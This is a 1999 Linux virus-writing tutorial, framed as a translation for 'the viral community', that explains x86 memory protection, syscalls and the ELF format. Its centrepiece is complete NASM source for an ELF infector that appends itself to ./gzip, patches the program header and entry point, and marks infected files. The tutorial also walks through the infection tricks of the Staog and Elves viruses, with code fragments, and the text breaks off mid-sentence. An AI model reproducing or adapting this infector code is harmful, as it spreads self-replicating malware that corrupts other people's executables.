

  1. Introduction
    1. Foreword by Billy Belcebu
    2. Original Author Introduction
  2. ELF Infection
  3. Resident viruses
    1. Global residency in Ring-0
    2. Global residency in Ring-3
    3. PerProcess residency

NOTE: This article was written against kernel version 2.0.34, where the segment layout differs from that of current kernel versions such as 2.2.XX.


Foreword by Billy Belcebu

Hi, and welcome to the world's first ever Virus Writing Guide for the LiNUX system. This tutorial was NOT written by me; my only intention is to translate it for the viral community in general. If you want to take a look at the original version (which is in Spanish), you can find it on my own website (http://beautifulpeople.cjb.net).

The author, who wants to remain anonymous, has shown impressive LiNUX skills as well as a good level of assembler (rare for a LiNUX coder), but he has a problem with his lack of optimization ;)

My conclusions after reading this article are several: LiNUX kicks ass, LiNUX kicks Windoze's ass... Take a look at its heavy and very intelligent protection: it's almost impossible to reach Ring-0 (at least without being root), it's impossible to achieve Ring-3 global residency (thanks to the impressive copy-on-write mechanism), and all those details make the LiNUX system the best choice right now when it comes to operating systems. Really.

My English is not very good, but it seems that I'm the only one who wants to take the trouble to translate this. Besides, I think that leaving this jewel only in Spanish would be an unforgivable sin. So, here I am, translating it 4 u ;)


© 1999 Mr Anonymous [ Original Article ]

© 1999 Billy Belcebu/iKX [ Translation ]

PS: I have the author's permission for this. Don't blame me with copyrightz...

Introduction: Memory protection

The never-ending question: why are there no viruses for Linux? It seems that the viral community, accustomed to Real Mode systems (DOS), finds it hard to adapt to protected mode systems. Even for Win95/98, systems with important design problems, there exist more or less 30 viruses, the great majority of which are non-resident viruses or VxD infectors (Ring-0 devices).

It seems that the answer lies in the strong memory protection implemented by Linux.

Systems like Win95/NT use a memory design with limited use of segments. In these systems, both the user and the kernel selectors can address the whole virtual space, i.e. from 0x00000000 to 0xFFFFFFFF (that doesn't mean that you can write to all of memory, because memory pages also have protection attributes).

In Linux, however, the design is very different: segmentation separates two distinct zones, one dedicated to user processes, which goes from 0x00000000 to 0xC0000000, and another for the kernel, which goes from 0xC0000000 to 0xFFFFFFFF.

Let's see a register dump from GDB, taken at the beginning of the execution of a command like GZIP.

        (gdb)info registers

        eax           0x0        0
        ecx           0x1        1
        edx           0x0        0          
        ebx           0x0        0
        ebp           0xbffffd8c     0xbffffd8c
        esi           0xbffffd9c     0xbffffd9c
        edi           0x4000623c     1073766972
        eip           0x8048b10      0x8048b10
        eflags        0x296          662
        cs            0x23           35
        ss            0x2b           43
        ds            0x2b           43           
        es            0x2b           43
        fs            0x2b           43
        gs            0x2b           43

We can see that Linux uses selector 0x23 for code and selector 0x2B for data. Intel uses 16-bit selectors. The two least significant bits store the RPL (the privilege level requested through that selector; Intel implements 4 protection rings, but current operating systems like Win95/NT or Linux use only 2: Ring-0 for the kernel (maximum privilege level) and Ring-3 for user processes). The next bit tells where the descriptor holding the information about the segment is located: 0 for the GDT (GLOBAL DESCRIPTOR TABLE) or 1 for the LDT (LOCAL DESCRIPTOR TABLE). The remaining 13 bits are simply the index of the segment descriptor inside the LDT or the GDT, according to that bit.

	Selector [ 13 bits, Index to descriptor ] [ 1 bit, GDT/LDT ] [ 2 bits, RPL ]

Then, if we convert 0x23 to binary we get

	[ 0 0 0 0 0 0 0 0 0 0 1 0 0 ] [ 0 ] [ 1 1 ]

So we know that it is a Ring-3 selector (used by a process), and that the information about the segment lies in the GDT, at entry 4 (counting from zero). If we analyze the other selector (0x2B) we obtain similar information, but its descriptor is at entry 5.
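
The decoding done by hand above can be sketched in a few lines of Python. This is only an illustration of the selector layout; the names Selector and decode_selector are made up for this example and do not come from the kernel or from GDB.

```python
from typing import NamedTuple


class Selector(NamedTuple):
    index: int   # descriptor index inside the table (upper 13 bits)
    table: str   # "GDT" or "LDT" (table indicator bit)
    rpl: int     # requested privilege level, 0..3


def decode_selector(value: int) -> Selector:
    """Split a 16-bit x86 segment selector into its three fields."""
    if not 0 <= value <= 0xFFFF:
        raise ValueError("a selector is a 16-bit value")
    rpl = value & 0b11                          # bits 0-1
    table = "LDT" if value & 0b100 else "GDT"   # bit 2
    index = value >> 3                          # bits 3-15
    return Selector(index, table, rpl)


if __name__ == "__main__":
    # The user selectors from the GDB dump plus the two kernel selectors.
    for sel in (0x10, 0x18, 0x23, 0x2B):
        print(hex(sel), decode_selector(sel))
```

Feeding it 0x23 and 0x2B gives entries 4 and 5 of the GDT with RPL 3, while 0x10 and 0x18 give entries 2 and 3 with RPL 0.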

If we take a look at the kernel's code, more specifically at the file /usr/src/linux/arch/i386/kernel/head.S (painfully, in assembler :)), we can see the segment initialization in Linux.

 * This gdt setup gives the kernel a 1GB address space at virtual
 * address 0xC0000000 - space enough for expansion, I hope.

        .quad 0x0000000000000000        /* NULL descriptor */
        .quad 0x0000000000000000        /* not used */
        .quad 0xc0c39a000000ffff        /* 0x10 kernel 1GB code at 0xC0000000 */
        .quad 0xc0c392000000ffff        /* 0x18 kernel 1GB data at 0xC0000000 */
        .quad 0x00cbfa000000ffff        /* 0x23 user   3GB code at 0x00000000 */
        .quad 0x00cbf2000000ffff        /* 0x2b user   3GB data at 0x00000000 */
        .quad 0x0000000000000000        /* not used */
        .quad 0x0000000000000000        /* not used */
        .fill 2*NR_TASKS,8,0            /* space for LDT's and TSS's etc */
        .quad 0x00c09a0000000000        /* APM CS    code */
        .quad 0x00809a0000000000        /* APM CS 16 code (16 bit) */
        .quad 0x00c0920000000000        /* APM DS    data */

As you can see, Linux initializes 4 segments: 2 for the kernel and 2 for the user, one for code and one for data in each case. Each entry stores information such as the base address of the segment and its limit, whether it is present in memory or not, the kind of segment, and whether its code is 16 or 32 bits. As long as DS holds a user selector, we can never touch an address above 0xC0000000, because we would be outside the memory reachable through the segment; we would receive a SIGSEGV signal and our process would be terminated painfully.
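
To check the comments in head.S against the raw numbers, here is a minimal sketch that unpacks an 8-byte descriptor following the standard i386 descriptor layout. The names Descriptor and decode_descriptor are hypothetical, and only the fields discussed in the text are extracted.

```python
from typing import NamedTuple


class Descriptor(NamedTuple):
    base: int       # linear base address of the segment
    size: int       # segment size in bytes
    dpl: int        # descriptor privilege level, 0..3
    is_code: bool   # True for a code segment, False for a data segment
    present: bool   # the "present in memory" bit


def decode_descriptor(raw: int) -> Descriptor:
    """Unpack a 64-bit i386 code/data segment descriptor."""
    limit = (raw & 0xFFFF) | (((raw >> 48) & 0xF) << 16)
    base = ((raw >> 16) & 0xFFFFFF) | (((raw >> 56) & 0xFF) << 24)
    access = (raw >> 40) & 0xFF
    granular = bool((raw >> 55) & 1)   # G bit: limit counted in 4 KB pages
    size = (limit + 1) * (4096 if granular else 1)
    return Descriptor(
        base=base,
        size=size,
        dpl=(access >> 5) & 0b11,
        is_code=bool(access & 0x08),
        present=bool(access & 0x80),
    )


if __name__ == "__main__":
    # The four descriptors from the head.S listing.
    for raw in (0xC0C39A000000FFFF, 0xC0C392000000FFFF,
                0x00CBFA000000FFFF, 0x00CBF2000000FFFF):
        d = decode_descriptor(raw)
        print(f"{raw:#018x} base={d.base:#010x} size={d.size:#x} "
              f"dpl={d.dpl} {'code' if d.is_code else 'data'}")
```

The kernel entries come out with base 0xC0000000, 1 GB and DPL 0; the user entries with base 0, 3 GB and DPL 3, which matches the comments in the listing.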

I know I can address from 0x00000000 to 0xC0000000 but, what can I modify? Here begins the real protection mechanism. Memory is divided into pages of 4 KB each in the case of Intel, and each page has its own attributes: whether it is read-only or read/write, whether it is in memory (it can temporarily be on disk), whether it belongs to the kernel, etc.

All the information about the pages in memory is located in a page table that contains a descriptor for each mapped page. There is one page table for each process in memory; this gives each process its own virtual space and, besides, prevents any process from accessing the memory of another one.

This makes it possible to load programs at the same memory address, and that is really what happens. Windows 95/98 and Linux both do it. In Linux the usual load address is 0x08048000, while in Windows it is 0x00400000.

This page table is pointed to by a control register of the processor (CR3), so it changes with every context switch, which also changes the virtual space of the process.
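
As a small illustration of how an address maps onto 4 KB pages, the sketch below splits a 32-bit address into its paging fields. It assumes the classic two-level i386 scheme (10 bits of page directory index, 10 bits of page table index, 12 bits of offset), a detail the text above does not spell out; the function names are invented for the example.

```python
PAGE_SHIFT = 12                 # 4 KB pages
PAGE_SIZE = 1 << PAGE_SHIFT
KERNEL_BASE = 0xC0000000        # start of the kernel zone described above


def split_address(addr: int) -> tuple:
    """Return (directory index, table index, offset) for a 32-bit address.

    Assumes classic two-level i386 paging (10 + 10 + 12 bits).
    """
    if not 0 <= addr <= 0xFFFFFFFF:
        raise ValueError("expected a 32-bit address")
    directory = addr >> 22
    table = (addr >> PAGE_SHIFT) & 0x3FF
    offset = addr & (PAGE_SIZE - 1)
    return directory, table, offset


def is_user_address(addr: int) -> bool:
    """True if the address lies in the zone reserved for user processes."""
    return addr < KERNEL_BASE


if __name__ == "__main__":
    # EIP and EBP from the GDB register dump, plus the kernel base.
    for addr in (0x08048B10, 0xBFFFFD8C, 0xC0000000):
        print(hex(addr), split_address(addr), is_user_address(addr))
```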

But then, if a process can only address its per-process memory, how is it able to execute system calls that reside above 0xC0000000? Intel gives us mechanisms to jump to Ring-0 in a safe way when we need to make system calls. Intel offers two methods: TRAP GATES and CALL GATES. TRAP GATES are the usual choice (WinNT/98/95, Linux), although I believe that some other Unix systems use CALL GATES to make the ring jump.

Trap Gates occupy one entry in the IDT (INTERRUPT DESCRIPTOR TABLE), and allow the jump to Ring-0 through the generation of an interrupt. For that, the jump address defined in the IDT must have a Ring-0 selector, and the DPL (Descriptor Privilege Level) must be 3, allowing a user to execute it. In Linux the interrupt used for the jump is 0x80, while Win95 uses int 0x30, for example.

Let's see the disassembly of the getpid function of the LIBC library. For that we create a C file like this:

#include <unistd.h>

void main()
{
        getpid();        /* I get the PID of the process */
}

After compiling it, we debug the binary file with GDB:


        0x8048480 <main>:        pushl %ebp
        0x8048481 <main+1>:      movl  %esp,%ebp
        0x8048483 <main+3>:      call  0x8048378 <getpid>
        0x8048488 <main+8>:      movl  %ebp,%esp
        0x804848a <main+10>:     popl  %ebp
        0x804848b <main+11>:     ret

As you can see, the call to getpid is designed in Linux (and in other systems) as a CALL to a special section inside the binary file (0x8048378). There we find a jump to the desired library function. These jumps are built in memory by the OS to resolve the dynamic links with the libraries. With this, any file can execute functions exported by others, if the information in the ELF header says so. Let's continue debugging:

        (gdb)disass getpid

        0x40073000 <__getpid>:   pushl %ebp 
        0x40073001 <__getpid+1>: movl  %esp,%ebp
        0x40073003 <__getpid+3>: pushl %ebx
        0x40073004 <__getpid+4>: movl  $0x14,%eax
        0x40073009 <__getpid+9>: int   $0x80

These are the first instructions of the getpid library call. Its work is simple: it only prepares a jump to Ring-0. If the function had parameters, it would load them into registers before jumping to Ring-0. Then it puts the function number in EAX and calls int 0x80. As you can see, the code of the libraries lives in per-process memory, below 0xC0000000, so it is Ring-3 code and lacks the privileges needed to access ports, privileged memory areas, etc. That is why the libraries are really just intermediaries between the calls made by the processes and the calls generated via int 0x80.

All the system calls that need to jump to Ring-0 use int 0x80, and since int 0x80 has only one descriptor, we always jump to the same memory address. That is why we need to put the number of the function we want to call in the EAX register. In Ring-0, the kernel evaluates the value of EAX to know which function it has to serve and, according to that value, jumps to one function or another using an internal table of function pointers called sys_call_table. The list of functions accessible through int 0x80 is in the file /usr/include/sys/syscall.h
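
The idea of a single entry point that dispatches on EAX can be modelled in user space with a toy table. This is only a simulation to show the shape of the mechanism: int_0x80, SYS_CALL_TABLE and sys_getpid are hypothetical Python stand-ins, not the kernel's real code, and the only number used is the 0x14 that __getpid loads into EAX in the disassembly above.

```python
import errno
import os


def sys_getpid(ebx, ecx, edx):
    """Stand-in handler: getpid takes no parameters, so registers are ignored."""
    return os.getpid()


# Toy version of the table: function number -> handler.
SYS_CALL_TABLE = {
    0x14: sys_getpid,   # value placed in EAX by __getpid
}


def int_0x80(eax, ebx=0, ecx=0, edx=0):
    """Single entry point: look at EAX and jump to the matching handler."""
    handler = SYS_CALL_TABLE.get(eax)
    if handler is None:
        return -errno.ENOSYS    # unknown function number
    return handler(ebx, ecx, edx)


if __name__ == "__main__":
    print("getpid via the toy dispatcher:", int_0x80(0x14))
    print("unknown number:", int_0x80(9999))
```

The point of the sketch is that the caller never picks the target address; it only supplies a number, and the table decides where execution goes.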

With the execution of an int 0x80 the processor changes the active code selector. It changes from selector 0x23 to 0x10, so we go from addressing 0x00000000-0xC0000000 to addressing 0xC0000000-0xFFFFFFFF.

The other jump method, rarely used, is based on an entry in the GDT or, exceptionally, in the LDT. There we define what is called a CALL GATE, which allows jumps to rings of higher privilege via the CALL FAR or JMP FAR assembler instructions.

ELF infection

In Linux there are two executable formats: a.out and ELF; however, nowadays every Linux executable and library uses the second one. The ELF format is very powerful, and contains information to handle applications on different processors. It records the processor the executable was compiled for, and whether it uses little endian or big endian. As it is a format for processors in protected mode, besides the information about the physical sections present in the file, it carries information about how the OS has to map the file in memory.

The ELF file begins with a header; the fields discussed here occupy its first 0x24 bytes. It contains, among other things, the mark 0x7F 'ELF' to show that this is a file in ELF format, the kind of processor, the entry point (that is, the virtual address of the first instruction that will be executed in the file) and, after that, 2 pointers to 2 tables.

The first table pointed to is the Program Header (physically located right after the ELF header), whose entries describe how the file will be mapped in memory. Each entry contains the size of a segment in memory and in the file, as well as the address where the segment begins.

The other table is the Section Header, located at the end of the file. It contains information about each logical section, including protection attributes, but this information is not used to map the code of the file in memory.
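
For readers who want to look at these fields themselves, here is a minimal read-only sketch that unpacks a 32-bit little-endian ELF header with Python's struct module. The field names follow the usual ELF naming (the same names appear in the data zone of the listing further down); parse_elf32_header and build_sample_header are hypothetical helpers written for this example, and the sample values are synthetic.

```python
import struct
from typing import NamedTuple

# Full ELF32 header, little-endian: 52 bytes in total.
ELF32_HEADER = struct.Struct("<16sHHIIIIIHHHHHH")


class Elf32Header(NamedTuple):
    e_ident: bytes
    e_type: int
    e_machine: int
    e_version: int
    e_entry: int       # virtual address of the first instruction
    e_phoff: int       # file offset of the Program Header table
    e_shoff: int       # file offset of the Section Header table
    e_flags: int
    e_ehsize: int
    e_phentsize: int
    e_phnum: int
    e_shentsize: int
    e_shnum: int
    e_shstrndx: int


def parse_elf32_header(data: bytes) -> Elf32Header:
    """Parse the header of a 32-bit little-endian ELF image (read-only)."""
    if len(data) < ELF32_HEADER.size:
        raise ValueError("too short for an ELF32 header")
    header = Elf32Header(*ELF32_HEADER.unpack_from(data))
    if header.e_ident[:4] != b"\x7fELF":
        raise ValueError("missing ELF mark")
    if header.e_ident[4] != 1 or header.e_ident[5] != 1:
        raise ValueError("only 32-bit little-endian files are handled here")
    return header


def build_sample_header() -> bytes:
    """Synthetic header for the demo; the values are illustrative only."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    return ELF32_HEADER.pack(ident, 2, 3, 1, 0x08048B10, 52, 0, 0,
                             52, 32, 5, 40, 0, 0)


if __name__ == "__main__":
    hdr = parse_elf32_header(build_sample_header())
    print(f"entry={hdr.e_entry:#x} phoff={hdr.e_phoff} phnum={hdr.e_phnum}")
```

To inspect a real file, read its first 52 bytes in binary mode and pass them to parse_elf32_header; on a 64-bit system most binaries are ELF64 and this sketch will reject them.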

With the GDB command 'maintenance info sections' we can see the section structure with the protection attributes of each section. If you take a look at it, you'll notice that all the read-only sections come first, and the read/write sections are all together at the end. This is necessary because the code sections are mapped together in memory, in consecutive pages, by means of a single entry in the program header. That's why sections that share the same protection attributes can share memory pages, while sections with different attributes cannot. This avoids internal fragmentation in executables: if every section had to be mapped separately, the last page of every section would be partly empty, and a lot of space would be wasted.

Also notice that the last read-only section doesn't share a page with the first read/write one. The output of this command for a program like gzip would be the following:

 (gdb)maintenance info sections
 Exec file:
 '/bin/gzip', file type elf32-i386.
 0x080480d4->0x080480e7 at 0x000000d4: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x080480e8->0x08048308 at 0x000000e8: .hash ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08048308->0x08048738 at 0x00000308: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08048738->0x08048956 at 0x00000738: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08048998->0x08048b08 at 0x00000958: .rel.bss ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08048b10->0x08048b18 at 0x00000b10: .init ALLOC LOAD READONLY CODE HAS_CONTENTS
 0x08048b18->0x08048e08 at 0x00000b18: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS
 0x08048e10->0x08050dac at 0x00000e10: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
 0x08050db0->0x08050db8 at 0x00008db0: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
 0x08050db8->0x08051f25 at 0x00008db8: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08052f28->0x08053960 at 0x00009f28: .data ALLOC LOAD DATA HAS_CONTENTS
 0x08053960->0x08053968 at 0x0000a960: .ctors ALLOC LOAD DATA HAS_CONTENTS
 0x08053968->0x08053968 at 0x0000a968: .dtors ALLOC LOAD DATA HAS_CONTENTS
 0x08053970->0x08053a34 at 0x0000a970: .got ALLOC LOAD DATA HAS_CONTENTS
 0x08053a34->0x08053abc at 0x0000aa34: .dynamic ALLOC LOAD DATA HAS_CONTENTS
 0x08053abc->0x080a4078 at 0x0000aabc: .bss ALLOC
 0x00000000->0x00000178 at 0x0000aabc: .comment READONLY HAS_CONTENTS
 0x00000178->0x000002b8 at 0x0000ac34: .note READONLY HAS_CONTENTS

Take a look at that curious jump between the .rodata and .data sections, caused by everything I explained before. This command allows you to visualize how the program will look in memory, but its information is not important for loading. We won't even need to modify the section header to insert more executable code in the file. The Program Header is the one that truly drives the load process. It contains 5 entries, but it's possible to insert more.
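
The jump between .rodata and .data can be checked with a little arithmetic on the numbers from the dump. The sketch below uses a handful of the sections listed above (addresses and file offsets copied from the dump, the read/write flag derived from the READONLY attribute) and verifies that no 4 KB page holds both read-only and read/write sections. The helper names are made up for this example.

```python
PAGE_SHIFT = 12   # 4 KB pages

# (name, start address, end address, file offset, writable)
SECTIONS = [
    (".interp", 0x080480D4, 0x080480E7, 0x000000D4, False),
    (".text",   0x08048E10, 0x08050DAC, 0x00000E10, False),
    (".rodata", 0x08050DB8, 0x08051F25, 0x00008DB8, False),
    (".data",   0x08052F28, 0x08053960, 0x00009F28, True),
    (".got",    0x08053970, 0x08053A34, 0x0000A970, True),
    (".bss",    0x08053ABC, 0x080A4078, 0x0000AABC, True),
]


def pages_of(start, end):
    """Page numbers touched by the half-open address range [start, end)."""
    if end <= start:
        return set()
    return set(range(start >> PAGE_SHIFT, ((end - 1) >> PAGE_SHIFT) + 1))


def pages_by_protection(sections):
    """Return (read-only pages, read/write pages) for the given sections."""
    readonly, writable = set(), set()
    for _name, start, end, _offset, is_writable in sections:
        (writable if is_writable else readonly).update(pages_of(start, end))
    return readonly, writable


def load_bias(section):
    """Difference between a section's memory address and its file offset."""
    _name, start, _end, offset, _writable = section
    return start - offset


if __name__ == "__main__":
    ro, rw = pages_by_protection(SECTIONS)
    print("shared pages:", sorted(ro & rw))
    print("last read-only page:", hex(max(ro)))
    print("first read/write page:", hex(min(rw)))
    print("bias .rodata:", hex(load_bias(SECTIONS[2])))
    print("bias .data:  ", hex(load_bias(SECTIONS[3])))
```

The bias grows by exactly one page (0x1000) between .rodata and .data: the two sections are almost adjacent in the file, but in memory .data starts on the page after the one where .rodata ends, so each page keeps a single set of protection attributes.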

So one solution for insert more executable code could be the expanding of the data segment. This is problematic, because if we copy all the viric code to the end of the executable, i.e. just after the section header, and we expand the entry of the Program Header that corresponds with the data segment, the viral code would overwrite one logical section of the archive, the .bss section. As we had seen with the gdb dump, the .bss section is the last one that is part of the space of the process, and contains the ALLOC attribute, however it doesn't contains the LOAD attribute, so it doesn't load data from the file. This is caused by the fact that the .bss section contains uninitialized data (still) by the host code. If the viric code is mapped over that section is not very problematic, because the virus will be executed before the infected host, so after the virus execution, the host wouldn't care about it. This section, at load time, if filled of zeroes, so a bad programming, like suppose an uninitialized variable set to 0, would show the presence of the virus. In any case,the virus can avoid this copying itself to any other memory address, and filling its old position in .bss with zeroes.

Another possibility could be to create another entry in the program header, but we would have to shift almost all the archive, and this would take too much infection time.

;                      Linux ELF file infection
; Compile with:
;            nasm -f elf hole.asm -o hole.o
;            gcc hole.o -o hole

        [section .text]

        [global main]


        pusha                                   ; Beginning of the virus
                                                ; Push all the parameters
        call    getdelta
        pop     ebp
        sub     ebp,getdelta      
        mov     eax,125                         ; I modify the attributes with
        lea     ebx,[ebp+main]                  ; mprotect for write in protec-
                                                ; ted pages
        and     ebx,0xFFFFF000                  ; Round up to pages
        mov     ecx,03000h                      ; r|w|x attributes
        mov     edx,07h                         ; We will only need this in
        int     80h                             ; the 1st gen, because we'll
                                                ; copy us in the data section
        mov     ebx,01h
        lea     ecx,[ebp+texto]
        mov     edx,0Ch                         ; Show a Hello World with a
        call    sys_write                       ; write to stdout
        mov     eax,05
        lea     ebx,[ebp+archivo]               ; open file to infect (./gzip)
        mov     ecx,02                          ; read/write
        int     80h
        mov     ebx,eax                         ; Handle in EBX
        xor     ecx,ecx
        xor     edx,edx                         ; Go to beginning of file
        call    sys_lseek
        lea     ecx,[ebp+Elf_header]            ; Read the ELF header to our
        mov     edx,24h                         ; variable
        call    sys_read
        cmp     word [ebp+Elf_header+8],0xDEAD  ; Check for previous infection
        jne     infectar
        jmp     salir
        mov     word [ebp+Elf_header+8],0xDEAD
                                                ; The mark is on the 2 first
                                                ; fill bytes in the ident struc

        mov     ecx,[ebp+e_phoff]               ; e_phoff is a ptr to the PH
        add     ecx,8*4*3                       ; Obtain 3rd entry of data seg
        push    ecx
        xor     edx,edx
        call    sys_lseek                       ; Go to that position
        lea     ecx,[ebp+Program_header]        ; Read the entry
        mov     edx,8*4                  
        call    sys_read
        add     dword [ebp+p_filez],0x2000      ; increase segment size in
        add     dword [ebp+p_memez],0x2000      ; memory and in the file
; The size to add must be superior to the size of the virus, because besides
; copy the virus, we have also to copy the section table, located before
; and it is not mapped into mem by default. It could be shifted (for avoid
; copying it) but for simplycity reasons i don't do that.

        pop     ecx
        xor     edx,edx
        call    sys_lseek                       ; back to entry position
        lea     ecx,[ebp+Program_header]
        mov     edx,8*4
        call    sys_write                       ; Write entry to the file

        xor     ecx,ecx
        mov     edx,02h
        call    sys_lseek                       ; Go to file end

; EAX = File Size, that will be phisical offset of the virus
        mov     ecx,dword [ebp+oldentry]
        mov     dword [ebp+temp],ecx

        mov     ecx,dword [ebp+e_entry]
        mov     dword [ebp+oldentry],ecx

        sub     eax,dword [ebp+p_offset]
        add     dword [ebp+p_vaddr],eax
        mov     eax,dword [ebp+p_vaddr]         ; EAX = New entrypoint
        mov     dword [ebp+e_entry],eax
; These are the calculations of the new entry address, that will point to the
; code of the virus. For calculate the virtual address of the virus in memory
; i move the pointer to the end of the file with lseek, so the EAX register
; will have the phisical size of the file (i.e. the physical position of the
; virus in the file).
; If to that position i substract the physical position of the beginning of
; the data segment, i will have the virus position relative to the beginning
; of the data segment, and if i add to it the virtual address of the segment
; i will obtain the virtual address of the virus in memory.

        lea     ecx,[ebp+main]
        mov     edx,virend-main
        call    sys_write                       ; Write the virus to the end

        xor     ecx,ecx
        xor     edx,edx
        call    sys_lseek                       ; Set pointer to beginning of
                                                ; the file
        lea     ecx,[ebp+Elf_header]
        mov     edx,24h
        call    sys_write                       ; Modify header with new EIP

        mov     ecx,dword [ebp+temp]
        mov     dword [ebp+oldentry],ecx
salir:  mov     eax,06                          ; Close the file
        int     80h
        db      068h                            ; Opcode of a PUSH
        dd      hoste                           ; back to infected program

sys_read:                                       ; EBX = Must be File Handle
        mov     eax,3
        int     80h
sys_write:                                      ; EBX = Must be File Handle
        mov     eax,4
        int     80h
sys_lseek:                                      ; EBX = Must be File Handle
        mov     eax,19
        int     80h

dir     dd      main
        dw      010h
archivo db      "./gzip",0                      ; File to infect
datos   db      00h  

temp    dd      00h                             ; Save oldentry temporally

;**************** Data Zone *************************************************

newentry        dd 00h                          ; New virii EIP
newfentry       dd 00h
myvaddr         dd 00h
texto           db 'HELLO WORLD',0h

e_ident:     db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h          
e_type:      db 00h,00h
e_machine:   db 00h,00h
e_version:   db 00h,00h,00h,00h
e_entry:     db 00h,00h,00h,00h
e_phoff:     db 00h,00h,00h,00h
e_shoff:     db 00h,00h,00h,00h          
e_flags:     db 00h,00h,00h,00h
e_ehsize:    db 00h,00h
e_phentsize: db 00h,00h
e_phnum:     db 00h,00h
e_shentsize: db 00h,00h
e_shnum:     db 00h,00h
e_shstrndx:  db 00h,00h                
jur:         db 00h,00h,00h,00h

p_type       db 00h,00h,00h,00h
p_offset     db 00h,00h,00h,00h
p_vaddr      db 00h,00h,00h,00h
p_paddr      db 00h,00h,00h,00h        
p_filez      db 00h,00h,00h,00h
p_memez      db 00h,00h,00h,00h
p_flags      db 00h,00h,00h,00h
p_align      db 00h,00h,00h,00h
sh_name      db 00h,00h,00h,00h
sh_type      db 01h,00h,00h,00h
sh_flags     db 03h,00h,00h,00h      ;alloc
sh_addr      db 00h,00h,00h,00h
sh_offset    db 00h,00h,00h,00h
sh_size      dd (virend-main)*2
sh_link      db 00h,00h,00h,00h
sh_info      db 00h,00h,00h,00h
sh_addralign db 01h,00h,00h,00h
sh_entsize   db 00h,00h,00h,00h



If we execute this in a directory where is the gzip file, we will obtain the following message in the screen:


If we execut the gzip, we will obtain this:

 HELLO WORLDgzip: compressed data not written to a terminal. Use -f to force compression.
 For help, type:gzip -h

As you can see,the viral code is executed before the host, and after that it returns to it the control without any kind of dificulty.

However there are other methods that allow the infection without expanding any section of the Program Header. The Staog virus and the Elves virus use alternative methods.

Staog, for example, overwrites the entrypoint of the host with the code of the virus, and the overwritten code is copied to the end of the host. The virus, when receives the control at the execution moment, opens the file (for know the name it takes a look in the stack),takes the code of the virus and make a temporal file in the /tmp directory. After doing that, it calls to fork and while an execution thread is executing the viral code of the temporal archive by meand of execve, other execution thread copies that code to the stack of the program and give the control to that code, that will rebuild the code of the host, and return the control to the original entrypoint.

Elves, however, made by Super of the group 29A, uses a method much more advanced that makes perprocess residency, and avoids that the infected files grow up in size (cavity infection).

NOTE: For more information about perprocess residecy and the structure and use of the PLT, take a look to the article of perprocess residency.

The method consists in introduce the viral code in the PLT. The PLT is a necessary structure of the executable that allows the dynamic link of the functions. For that it doesn't move the PLT to other part of the executable or anything similar, the viral code overwrites it, but it continues working perfectly.

As i will explain in the article about PerProcess residency, there're 2 ways to make a call to a library: by means of the dynamic linker (when we don't know what's the address of the function), or directly with a specific entry for that function in the PLT (when we've already obtained in the GOT the address). After Elves infection, the second method is disabled, and all the calls are made by means of the dynamic linker. The virus overwrites from the second entry, leaving untouched the first one (the one that makes the jump to the dynamic linker).

As we can see in the article about PerProcess residency, an entry in the PLT has the following form:

       jmp     *address_of_GOT
        pushl   entry_in_reloc                  ; Necessary for the D.L. for
        jmp     first_PLT_entry                 ; know what function needs

As you can see, it's not a very optimized code, the first jump would occupy 5 bytes, the push other 5 bytes, and the next jump another 5 bytes, so the entry would have 15 bytes. So the virus is divided in blocks of 15 bytes, and this allows a sequential execution of the code in a normal way, but in the case that we try to make a jump to the beginning of a PLT entry, it would found a jmp previous_PLT_entry codified only with 2 bytes, with the opcodex 0xEB, 0xEE.

Let's see an example:

        pushl %eax
        call get_delta

        popl %edi
        enter $Stat_size,$0x0
        movl (Pushl+Pushal+Pushl)(%ebp),%eax

.byte 0x83
.byte 0xeb,0xee

        leal -0x7(%edi),%esi
        addl -0x4(%eax),%eax
        subl %esi,%eax
        shrl %eax
        movl %eax,(Pushl+Pushal)(%ebp)

.byte 0x83                 ; If we execute sequentially this code, we will
fake_plt_entry3:           ; execute the opcodes 0x83,0xEB,0xDE as if it was
.byte 0xeb,0xde            ; an only one opcode, so we would execute the
                           ; opcode sub ebx,-22
                           ; But if we make a system call, this jumps to the
                           ; 3rd entry of the PLT. The processor would find
                           ; the opcodes 0xEB,0xDE, that is the opcode of a
                           ; jmp fake_plt_entry2

By means of that, when a jump to any PLT entry is done, the execution thread would find miraculously 0xEB opcodes, that will go making little jumps until the virus_start label. From here, the virus will be execute sequentially garbage opcodes like sub ebx,-22 that really are hiding a jmp PLT_entry, and after trying to infect the first call to each system call, it makes a jump to the first PLT entry, so it jumps to the dynamic linker.

I received the source code of this virus for test it, and painfully, in my Linux version it is not functional (Debian 2.0.34). This is because Super, with his needs of optimizing in space the virus, makes the following code for push the reloc entry and avoid to put a push each entry (that would have make him to break the virus in fragments even smaller):

; This is a generic code for push the entry in the reloc section
        movl (Pushl+Pushal+Pushl)(%ebp),%eax
                                ; in EAX the return value of CALL imm
        leal -0x7(%edi),%esi    ; in ESI the offset to the beginning of PLT
        addl -0x4(%eax),%eax    ; in EAX the value of the immediate
        subl %esi,%eax          ; Substract the two values
        shrl %eax               ; in EAX i will have the reloc entry
        movl %eax,(Pushl+Pushal)(%ebp) ; Push the new value

The dynamic linker need entries in the .reloc.plt section for know what address it needs to resolve. For that, it supposes that the consecutive entries of the PLT will have consecutive entries in the .reloc.plt section, and if fact, that's true. If we take a look to any PLT, the compiler puts in the first PLT a PUSH 0x00, in the second PLT a PUSH 0x08, in the third a PUSH 0x10, and so on. This is not really a problem, the real problem is to suppose that all the calls to the PLT are done with a CALL immediate (being the immediate a 4 bytes value). When we do a CALL in assembler, the processor pushes the return address on the stack (i.e. the address of the next instruction of the call). The virus, as we can see, reads from the stack that value, substracts to it a 4 (the size of the immediate) and reads the value pointed by that address (the next code after the call). To that value, it substracts the PLT address, so we obtain the difference of bytes of the PLT entry we've called to, and the beginning of the PLT, and with that value, it obtains the entry value in the reloc section with a simple rotation opcode. This method is okay if we only make calls with the opcode CALL immediate. This might be true, for example in the newest Linux versions,but for example my Linux version makes 